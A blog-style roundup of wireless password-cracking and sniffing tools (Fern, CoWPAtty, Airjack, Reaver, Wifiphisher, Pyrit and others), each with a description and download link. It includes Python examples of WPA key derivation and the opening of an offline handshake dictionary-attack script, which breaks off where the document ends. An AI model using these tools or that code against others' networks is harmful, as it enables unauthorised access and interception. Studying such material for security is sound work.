<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Wireshark: <a href="https://www.wireshark.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://www.wireshark.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
6. Fern WiFi Wireless Cracker</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Fern WiFi Wireless Cracker is another nice tool which helps with network security. It lets you see real-time network traffic and identify hosts. Basically, this tool was developed to find flaws in computer networks and fix the detected flaws. It is available for the Apple, Windows and Linux platforms.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It is able to crack and recover WEP/WPA/WPS keys easily. It can also run other network-based attacks on wireless or Ethernet-based networks. For cracking WPA/WPA2, it uses WPS-based and dictionary-based attacks. For WEP cracking, it uses the Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is in active development. So, you can expect timely updates with new features. A Pro version of the tool is also available which offers more features.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Fern WiFi Wireless cracker: <a href="http://www.fern-pro.com/downloads.php" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.fern-pro.com/downloads.php</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
7. CoWPAtty</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CoWPAtty is another nice wireless password cracking tool. It is an automated dictionary attack tool for WPA-PSK to crack passwords. It runs on Linux and offers a rather plain command line interface to work with. It runs on a word-list containing thousands of passwords to use in the attack. If the password is in the word-list, this tool will crack it. But this tool is slow, and its speed depends on the word-list and the password’s strength. Another reason for the slow process is that the hash uses SHA1 with the SSID as a seed (salt). It means the same password produces a different hash under a different SSID. So, you cannot simply use one rainbow table against all access points. Instead, the tool takes the password dictionary and generates the hash for each word contained in the dictionary using the SSID. This tool is simple to use with the available commands.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
With the newer version of the tool, CoWPAtty tried to improve the speed by using a pre-computed hash file to avoid the computation at the time of cracking. This pre-computed file contains around 172000 dictionary entries for around 1000 of the most popular SSIDs. But for a successful attack, your SSID must be in that list. If your SSID is not in those 1000, you are unlucky. Still, you can try this tool to see how it works.</div>
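The SSID-seeded hash the two paragraphs above describe is the WPA/WPA2-PSK key derivation from IEEE 802.11i: PBKDF2 with HMAC-SHA1, the SSID as the salt, 4096 iterations and a 256-bit output. The functions below are an added example written for this page, not CoWPAtty's code; they use only Python's standard library plus the "password"/"IEEE" test vector from the 802.11i annex, and the SSID names and word-list are constructed. The example shows the two consequences the text draws: a table of pre-computed keys is valid for exactly one SSID (so a non-default SSID defeats it), and every guess costs thousands of HMAC calls (so a long passphrase makes dictionary attacks expensive).

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PSK_LENGTH = 32            # 256-bit pairwise master key


def wpa_psk(passphrase, ssid):
    """Derive the 256-bit PSK (PMK) from an ASCII passphrase and the network SSID.

    802.11i restricts the passphrase to 8..63 printable ASCII characters.
    """
    if len(passphrase) not in range(8, 64):
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PSK_LENGTH)


def hmac_calls_per_guess():
    """HMAC-SHA1 invocations needed to test one candidate passphrase.

    SHA1 yields 20 bytes per PBKDF2 block, so a 32-byte key needs two blocks,
    each costing PBKDF2_ITERATIONS HMAC calls.
    """
    blocks = -(-PSK_LENGTH // hashlib.sha1().digest_size)   # ceiling division
    return blocks * PBKDF2_ITERATIONS


def build_psk_table(ssid, wordlist):
    """A pre-computed table like CoWPAtty's: passphrase -> PSK, for ONE ssid."""
    return {word: wpa_psk(word, ssid) for word in wordlist}


def table_is_reusable(table, other_ssid):
    """True only if every entry of the table is still correct under other_ssid.

    Because the SSID is the salt, this is False whenever the SSIDs differ,
    which is why the text says one rainbow table cannot serve all access points.
    """
    return all(wpa_psk(word, other_ssid) == psk for word, psk in table.items())


if __name__ == "__main__":
    # Constructed word-list and SSIDs; "home-wifi" stands in for a common default name.
    words = ["password", "letmein1", "ThisIsAPassword"]
    table = build_psk_table("home-wifi", words)
    print("PSK for 'password' on SSID 'IEEE':", wpa_psk("password", "IEEE").hex())
    print("table for 'home-wifi' valid for 'home-wifi'?   ", table_is_reusable(table, "home-wifi"))
    print("table for 'home-wifi' valid for 'MyUniqueNet42'?", table_is_reusable(table, "MyUniqueNet42"))
    print("HMAC-SHA1 calls per passphrase guess:", hmac_calls_per_guess())
```

The 802.11i annex value for passphrase "password" on SSID "IEEE" begins f42c6fc5..., which the first print line reproduces; the same passphrase on any other SSID gives an unrelated key.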
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download CoWPAtty: <a href="http://sourceforge.net/projects/cowpatty/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://sourceforge.net/projects/cowpatty/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
8. Airjack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Airjack is a Wi-Fi 802.11 packet injection tool. It is used to perform DoS attacks and MITM attacks. This wireless cracking tool is very useful for injecting forged packets and taking a network down with a denial of service attack. This tool can also be used for a man-in-the-middle attack in the network. This tool is both popular and powerful.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download AirJack: <a href="http://sourceforge.net/projects/airjack/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://sourceforge.net/projects/airjack/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
9. WepAttack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WepAttack is another working open source Linux tool for breaking 802.11 WEP keys. Like a few other tools in the list, this tool also performs an active dictionary attack. It tests millions of words from its dictionary to find the working key for the network. Only a working WLAN card is required to perform the attack with WepAttack. It has limited usability but works very well on supported WLAN cards.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download WepAttack: <a href="http://wepattack.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://wepattack.sourceforge.net/</a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
10. NetStumbler</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
NetStumbler is another wireless password cracking tool, available only for the Windows platform. It helps in finding open wireless access points. This tool is freely available. Basically, NetStumbler is used for wardriving, verifying network configurations, finding locations with poor coverage, detecting unauthorized access points, and more.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is not very effective now. The main reason is that the last stable release of the tool was back in April 2004, around 11 years ago. So, it does not work with 64-bit Windows OS. It can also be easily detected by most of the wireless intrusion detection systems available. So, you can use this tool for learning purposes on a home network to see how it works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A trimmed-down version of the tool, dubbed ‘MiniStumbler’, is also available. This tool is too old, but it still works fine on supported systems. So, I included it in this list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download NetStumbler: <a href="http://www.stumbler.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.stumbler.net/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
11. inSSIDer</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
inSSIDer is one of the most popular Wi-Fi scanners for the Microsoft Windows and OS X platforms. This tool was released under an open source license and was also awarded “Best Open Source Software in Networking”. Later it became a premium tool and now costs $19.99. The inSSIDer Wi-Fi scanner can do various tasks, including finding open Wi-Fi access points, tracking signal strength, and saving logs with GPS records. Basically, this tool is used by network administrators to find issues in wireless networks.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download inSSIDer: <a href="http://www.inssider.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.inssider.com/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
12. Wifiphisher</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wifiphisher is another nice hacking tool to get the password of a wireless network. This tool can execute a fast automated phishing attack against a Wi-Fi wireless network to steal passwords. This tool comes pre-installed on Kali Linux. It is free to use and is available for Windows, Mac and Linux.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download and read more about WiFiphisher:<a href="https://github.com/sophron/wifiphisher" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://github.com/sophron/wifiphisher" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://github.com/sophron/wifiphisher</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
13. KisMac</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
KisMAC is a tool very similar to Kismet, which we added to the list above. It offers Kismet-like features as a wireless network discovery tool and, as the name suggests, is only available for Mac. It scans for networks passively on supported wireless cards (and actively on others) and can then try to recover WEP and WPA keys by brute force, by wordlist attack, or by exploiting the known weaknesses of WEP.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download KisMac:<a href="http://kismac-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="http://kismac-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://kismac-ng.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
14. Reaver</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Reaver is an open-source tool that brute-forces the WPS (Wi-Fi Protected Setup) PIN of an access point; once the eight-digit PIN is recovered, the access point hands over the WPA/WPA2 passphrase, so the attack works no matter how strong the passphrase itself is. The design flaw is that the PIN is verified in two halves and its last digit is a checksum, which cuts the search space from 10^8 to about 11,000 attempts. The original project was hosted on Google Code, which has since shut down, and the original code has not been updated for years; a maintained fork (reaver-wps-fork-t6x on GitHub) continues development. It is a good alternative to the other tools in this list that use the same attack method, and the WPS attack only works while the access point keeps WPS enabled and does not lock out after failed PINs.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Reaver:<a href="https://code.google.com/p/reaver-wps/downloads/list" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://code.google.com/p/reaver-wps/downloads/list" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/reaver-wps/downloads/list</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
15. Wifite</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wifite is a nice tool that automates attacks against several networks at once: it drives aircrack-ng for WEP and WPA handshake attacks and Reaver for attacks on WPS-enabled networks. It runs on Linux and offers options for filtering targets and automating the cracking step.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Wifite: <a href="https://github.com/derv82/wifite" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://github.com/derv82/wifite</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
16. WepDecrypt</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WepDecrypt is a wireless LAN tool written in C. It can recover WEP keys by dictionary attack, distributed network attack, a key generator and some other methods. It needs a few libraries to build; the details are on the download page. The tool is not widely used, but it is useful for beginners who want to see how a dictionary attack works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download and read more about WepDecrypt:<a href="http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
17. OmniPeek</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
OmniPeek is a packet sniffer and network protocol analyzer. It is only available for Windows and is a commercial product. It requires good knowledge of network protocols and of how packets are structured. It works with most network interface cards on the market, and around 40 plugins are available to extend its functions.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download OmniPeek:<a href="http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
18. CloudCracker</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CloudCracker is an online password-cracking service for recovering the WPA keys of wireless networks; it can also be used to crack other kinds of password hashes. You upload the captured handshake file and enter the network name, and the service runs a dictionary attack against it. The network name is required because the SSID is the salt in the WPA key derivation: the same passphrase gives a different key on every network, so precomputed tables only help for a known SSID. With its dictionary of 3000 million words it is likely to find a weak password, but a long random passphrase stays out of reach. It also handles MD5, SHA and a few other hash types, and is worth mentioning among wireless cracking tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
See CloudCracker: <a href="https://www.cloudcracker.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://www.cloudcracker.com/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
19. CommView for Wi-Fi</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CommView for Wi-Fi is also a popular wireless network monitor and packet analyzer. It comes with an easy-to-understand GUI. It is aimed at Wi-Fi network administrators and security professionals who want to monitor and troubleshoot network problems, and it works with 802.11 a/b/g/n/ac networks. It captures every packet and lets you see useful information about the network, such as protocol distribution, access points and signal strength. It does not crack keys itself, but the captures it produces are what the cracking tools in this list work on.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download CommView: <a href="http://www.tamos.com/products/commwifi/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.tamos.com/products/commwifi/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
20. Pyrit</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Pyrit is a very good tool for attacking IEEE 802.11 WPA/WPA2-PSK authentication. It is free and was hosted on Google Code, which has since shut down; development continues on GitHub (JPaulMordy/Pyrit). It runs on a range of platforms including FreeBSD, Mac OS X and Linux.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Its strength is speed rather than a new attack: Pyrit precomputes the pairwise master keys (PMKs) for a given SSID from a wordlist, can use GPUs through CUDA or OpenCL to do so, and stores the results in a database so that later attacks against the same network name finish quickly. It then checks each candidate against a captured 4-way handshake. It is very effective, and I recommend you try it once.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Pyrit:<a href="https://code.google.com/p/pyrit/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://code.google.com/p/pyrit/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/pyrit/</span></a></div>
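<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The computation that CloudCracker, Pyrit and the other WPA crackers above actually perform, as an added example (this is not code from the original post or from any of those tools): derive the PMK from passphrase and SSID, expand it into the PTK with both MAC addresses and both nonces, and recompute the MIC of handshake message 2 for every wordlist candidate until it matches the captured one. The handshake values (SSID, MACs, nonces, passphrase) are constructed for the demo rather than taken from a real capture, and the EAPOL frame is a minimal WPA2/CCMP message 2.</div>

```python
"""Offline WPA/WPA2-PSK dictionary attack, end to end.  Added example; all
handshake values are constructed for the demo, not taken from a real capture."""
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Optional

MIC_OFFSET = 81  # byte offset of the Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
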